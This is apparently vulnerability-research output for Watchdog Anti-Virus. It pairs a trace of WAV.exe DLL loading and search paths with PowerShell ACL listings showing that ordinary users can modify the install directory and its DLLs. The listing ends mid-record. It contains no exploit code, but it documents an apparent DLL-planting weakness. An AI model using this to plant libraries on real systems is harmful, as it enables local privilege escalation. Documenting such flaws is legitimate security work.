WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.Sciter.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryA,LPCSTR: powrprof.dll
WAV.exe,LoadLibraryExA,LPCSTR: powrprof.dll, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : powrprof.dll, dwFlags : NONE
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\powrprof.dll, LPCSTR: PowerRegisterSuspendResumeNotification
WAV.exe,LoadLibraryA,LPCSTR: ws2_32.dll
WAV.exe,LoadLibraryExA,LPCSTR: ws2_32.dll, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : ws2_32.dll, dwFlags : NONE
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: GetHostNameW
WAV.exe,LoadLibraryExW,LPCWSTR : Microsoft.DiaSymReader.Native.amd64.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, LPCSTR: DllGetClassObject
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, LPCSTR: DllGetClassObject
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.SDK.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\wsdk-antivirus.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\wsdk-antivirus.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\wsdk-antivirus.dll, LPCSTR: wsdk_init
WAV.exe,LoadLibraryExA,LPCSTR: winhttp.dll, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : winhttp.dll, dwFlags : NONE
WAV.exe,LoadLibraryA,LPCSTR: libclamav.dll
WAV.exe,LoadLibraryExA,LPCSTR: libclamav.dll, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : libclamav.dll, dwFlags : NONE
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libclamav.dll, LPCSTR: cl_init
WAV.exe,LoadLibraryA,LPCSTR: libclamunrar_iface.dll.9.0.4
WAV.exe,LoadLibraryExA,LPCSTR: libclamunrar_iface.dll.9.0.4, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : libclamunrar_iface.dll.9.0.4, dwFlags : NONE
WAV.exe,LoadLibraryA,LPCSTR: libclamunrar_iface.dll.9
WAV.exe,LoadLibraryExA,LPCSTR: libclamunrar_iface.dll.9, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : libclamunrar_iface.dll.9, dwFlags : NONE
WAV.exe,LoadLibraryA,LPCSTR: libclamunrar_iface.dll
WAV.exe,LoadLibraryExA,LPCSTR: libclamunrar_iface.dll, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : libclamunrar_iface.dll, dwFlags : NONE
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libclamunrar_iface.dll, LPCSTR: libclamunrar_iface_LTX_unrar_open
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libclamunrar_iface.dll, LPCSTR: libclamunrar_iface_LTX_unrar_peek_file_header
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libclamunrar_iface.dll, LPCSTR: libclamunrar_iface_LTX_unrar_extract_file
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libclamunrar_iface.dll, LPCSTR: libclamunrar_iface_LTX_unrar_skip_file
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libclamunrar_iface.dll, LPCSTR: libclamunrar_iface_LTX_unrar_close
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libclamav.dll, LPCSTR: cl_engine_new
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libclamav.dll, LPCSTR: cl_load
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\wsdk-antivirus.dll, LPCSTR: wsdk_set_settings
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\secur32.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Security.Cryptography.Algorithms.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Security.Cryptography.Primitives.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Netapi32.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\Netapi32.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : Netapi32.dll, dwFlags : NONE
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\Netapi32.dll, LPCSTR: NetGetJoinInformationW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\Netapi32.dll, LPCSTR: NetGetJoinInformation
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Net.Requests.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Net.ServicePoint.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Net.WebHeaderCollection.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Net.Http.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\winhttp.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\WINHTTP.dll, LPCSTR: WinHttpGetIEProxyConfigForCurrentUserW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\WINHTTP.dll, LPCSTR: WinHttpGetIEProxyConfigForCurrentUser
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Diagnostics.Tracing.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\WINHTTP.dll, LPCSTR: WinHttpOpenW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\WINHTTP.dll, LPCSTR: WinHttpOpen
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Net.Security.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\WINHTTP.dll, LPCSTR: WinHttpGetProxyForUrlW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\WINHTTP.dll, LPCSTR: WinHttpGetProxyForUrl
WAV.exe,LoadLibraryExW,LPCWSTR : dxgi.dll, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : d3d11.dll, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : sspicli.dll, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Security.Cryptography.X509Certificates.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Diagnostics.DiagnosticSource.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Security.Claims.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : mscms.dll, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Net.Sockets.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\ws2_32.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: WSAStartup
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: WSASocketWW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: WSASocketW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: closesocket
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: WSASocketWW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: WSASocketW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: WSASocketWW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: WSASocketW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: setsockopt
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: setsockopt
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Net.NameResolution.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: WSAStartup
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: GetAddrInfoW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: FreeAddrInfoW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: getsockopt
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: WSAConnect
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Threading.ThreadPool.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\sspicli.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\SSPICLI.DLL, LPCSTR: EnumerateSecurityPackagesW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\SSPICLI.DLL, LPCSTR: FreeContextBuffer
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Diagnostics.Process.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\SSPICLI.DLL, LPCSTR: AcquireCredentialsHandleW
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\SSPICLI.DLL, LPCSTR: InitializeSecurityContextW
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\wsdk-antivirus.dll, LPCSTR: wsdk_get_version
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Threading.Overlapped.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: WSASend
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: WSARecv
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\SSPICLI.DLL, LPCSTR: QueryContextAttributesW
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Security.Cryptography.Encoding.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\SSPICLI.DLL, LPCSTR: EncryptMessage
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: send
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: recv
WAV.exe,LoadLibraryExW,LPCWSTR : dwrite.dll, dwFlags : NONE
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\SSPICLI.DLL, LPCSTR: DecryptMessage
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\SSPICLI.DLL, LPCSTR: DeleteSecurityContext
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\System32\WS2_32.dll, LPCSTR: shutdown
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.IO.Compression.Native.dll, LPCSTR: CompressionNative_InflateEnd
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\wsdk-antivirus.dll, LPCSTR: wsdk_disable_realtime
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\wsdk-antivirus.dll, LPCSTR: wsdk_auto_update_enable
WAV.exe,LoadLibraryA,LPCSTR: libfreshclam.dll
WAV.exe,LoadLibraryExA,LPCSTR: libfreshclam.dll, dwFlags : NONE
WAV.exe,LoadLibraryExW,LPCWSTR : libfreshclam.dll, dwFlags : NONE
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\SSPICLI.DLL, LPCSTR: FreeCredentialsHandle
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.exe, LPCSTR: QueueUserAPCEx_Init
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libfreshclam.dll, LPCSTR: fc_strerror
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libfreshclam.dll, LPCSTR: fc_initialize
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libfreshclam.dll, LPCSTR: fc_cleanup
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libfreshclam.dll, LPCSTR: fc_prune_database_directory
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libfreshclam.dll, LPCSTR: fc_test_database
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libfreshclam.dll, LPCSTR: fc_dns_query_update_info
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libfreshclam.dll, LPCSTR: fc_download_url_database
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libfreshclam.dll, LPCSTR: fc_download_url_databases
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libfreshclam.dll, LPCSTR: fc_update_database
WAV.exe,GetProcAddress,hModule : C:\Program Files (x86)\Watchdog Anti-Virus\scanner1\libfreshclam.dll, LPCSTR: fc_update_databases
WAV.exe,LoadLibraryExW,LPCWSTR : Microsoft.DiaSymReader.Native.amd64.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, LPCSTR: DllGetClassObject
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, LPCSTR: DllGetClassObject
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\.sentry-native
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT SERVICE\TrustedInstaller Allow FullControl
NT SERVICE\TrustedInstaller Allow 268435456
NT AUTHORITY\SYSTEM Allow FullControl
NT AUTHORITY\SYSTEM Allow 268435456
BUILTIN\Administrators Allow FullControl
BUILTIN\Administrators Allow 268435456
BUILTIN\Users Allow -1610612736
CREATOR OWNER Allow 268435456
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow -1610612736
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow -1610612736
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;OICIID;0x1301bf;;;BU)(A;ID;FA;;;S-1-5-80-956008885-3
418522649-1831038044-1853292631-2271478464)(A;CIIOID;GA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-
2271478464)(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A;ID;FA;;;BA)(A;OICIIOID;GA;;;BA)(A;OICIIOID;GXGR;;;BU)(A;OICIIO
ID;GA;;;CO)(A;ID;0x1200a9;;;AC)(A;OICIIOID;GXGR;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)(A;OICIIOID;GXGR;;;S-1-15-2-2
)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\DefaultDatabases
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT SERVICE\TrustedInstaller Allow FullControl
NT SERVICE\TrustedInstaller Allow 268435456
NT AUTHORITY\SYSTEM Allow FullControl
NT AUTHORITY\SYSTEM Allow 268435456
BUILTIN\Administrators Allow FullControl
BUILTIN\Administrators Allow 268435456
BUILTIN\Users Allow -1610612736
CREATOR OWNER Allow 268435456
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow -1610612736
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow -1610612736
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;OICIID;0x1301bf;;;BU)(A;ID;FA;;;S-1-5-80-956008885-3
418522649-1831038044-1853292631-2271478464)(A;CIIOID;GA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-
2271478464)(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A;ID;FA;;;BA)(A;OICIIOID;GA;;;BA)(A;OICIIOID;GXGR;;;BU)(A;OICIIO
ID;GA;;;CO)(A;ID;0x1200a9;;;AC)(A;OICIIOID;GXGR;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)(A;OICIIOID;GXGR;;;S-1-15-2-2
)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\scanner1
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT SERVICE\TrustedInstaller Allow FullControl
NT SERVICE\TrustedInstaller Allow 268435456
NT AUTHORITY\SYSTEM Allow FullControl
NT AUTHORITY\SYSTEM Allow 268435456
BUILTIN\Administrators Allow FullControl
BUILTIN\Administrators Allow 268435456
BUILTIN\Users Allow -1610612736
CREATOR OWNER Allow 268435456
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow -1610612736
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow -1610612736
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;OICIID;0x1301bf;;;BU)(A;ID;FA;;;S-1-5-80-956008885-3
418522649-1831038044-1853292631-2271478464)(A;CIIOID;GA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-
2271478464)(A;ID;FA;;;SY)(A;OICIIOID;GA;;;SY)(A;ID;FA;;;BA)(A;OICIIOID;GA;;;BA)(A;OICIIOID;GXGR;;;BU)(A;OICIIO
ID;GA;;;CO)(A;ID;0x1200a9;;;AC)(A;OICIIOID;GXGR;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)(A;OICIIOID;GXGR;;;S-1-15-2-2
)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\C
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\crashpad_handler.exe
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\IEShims.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\libcrypto-1_1-x64.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\libssl-1_1-x64.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\log4cpp.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-2015969053-4181822921-3402349266-513D:AI(A;ID;0x1301bf;;;BU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0
x1200a9;;;AC)(A;ID;0x1200a9;;;S-1-15-2-2)
Path : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\log4net.dll
Owner : BUILTIN\Administrators
Group : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
